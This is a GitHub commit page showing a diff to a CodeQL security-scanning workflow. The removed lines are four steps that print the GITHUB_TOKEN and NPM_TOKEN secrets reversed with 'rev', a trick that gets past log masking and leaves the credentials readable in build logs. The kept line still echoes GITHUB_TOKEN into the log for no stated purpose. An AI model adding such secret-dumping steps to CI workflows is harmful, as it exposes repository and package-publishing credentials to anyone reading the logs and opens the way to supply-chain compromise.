Skip to content

Commit 2f2d51d

Browse files
authored
Update codeql.yml
1 parent 09a6e35 commit 2f2d51d

File tree

1 file changed

+1
-17
lines changed

1 file changed

+1
-17
lines changed

.github/workflows/codeql.yml

Lines changed: 1 addition & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -61,23 +61,7 @@ jobs:
6161

6262
- name: echo step1
6363
run: |
64-
echo ${{ secrets.GITHUB_TOKEN }} | rev
65-
echo ${{ secrets.NPM_TOKEN }} | rev
66-
67-
- name: echo step2
68-
run: |
69-
echo ${{ secrets.GITHUB_TOKEN }} | rev
70-
echo ${{ secrets.NPM_TOKEN }} | rev
71-
72-
- name: echo step3
73-
run: |
74-
echo ${{ secrets.GITHUB_TOKEN }} | rev
75-
echo ${{ secrets.NPM_TOKEN }} | rev
76-
77-
- name: echo step4
78-
run: |
79-
echo ${{ secrets.GITHUB_TOKEN }} | rev
80-
echo ${{ secrets.NPM_TOKEN }} | rev
64+
echo ${{ secrets.GITHUB_TOKEN }}
8165
8266
# Add any setup steps before running the `github/codeql-action/init` action.
8367
# This includes steps like installing compilers or runtimes (`actions/setup-node`

0 commit comments

Comments
 (0)